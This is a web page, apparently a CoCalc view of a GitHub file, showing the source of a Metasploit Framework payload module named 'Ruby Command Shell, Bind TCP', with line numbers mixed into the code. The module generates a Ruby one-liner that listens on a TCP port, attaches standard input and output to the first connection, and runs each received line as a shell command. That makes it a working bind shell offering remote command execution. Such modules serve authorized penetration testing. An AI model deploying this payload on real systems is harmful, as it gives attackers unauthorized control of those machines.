CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/payloads/singles/ruby/shell_bind_tcp.rb
Views: 11766
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
7
module MetasploitModule
8
9
CachedSize = 516
10
11
include Msf::Payload::Single
12
include Msf::Payload::Ruby
13
include Msf::Sessions::CommandShellOptions
14
15
def initialize(info = {})
16
super(merge_info(info,
17
'Name' => 'Ruby Command Shell, Bind TCP',
18
'Description' => 'Continually listen for a connection and spawn a command shell via Ruby',
19
'Author' => [ 'kris katterjohn', 'hdm' ],
20
'License' => MSF_LICENSE,
21
'Platform' => 'ruby',
22
'Arch' => ARCH_RUBY,
23
'Handler' => Msf::Handler::BindTcp,
24
'Session' => Msf::Sessions::CommandShell,
25
'PayloadType' => 'ruby',
26
'Payload' => { 'Offsets' => {}, 'Payload' => '' }
27
))
28
end
29
30
def generate(_opts = {})
31
return prepends(ruby_string)
32
end
33
34
def ruby_string
35
"require 'socket';s=TCPServer.new(#{datastore['LPORT'].to_i});c=s.accept;s.close;"+
36
"$stdin.reopen(c);$stdout.reopen(c);$stderr.reopen(c);$stdin.each_line{|l|l=l.strip;next if l.length==0;" +
37
"(IO.popen(l,\"rb\"){|fd| fd.each_line {|o| c.puts(o.strip) }}) rescue nil }"
38
end
39
end
40
41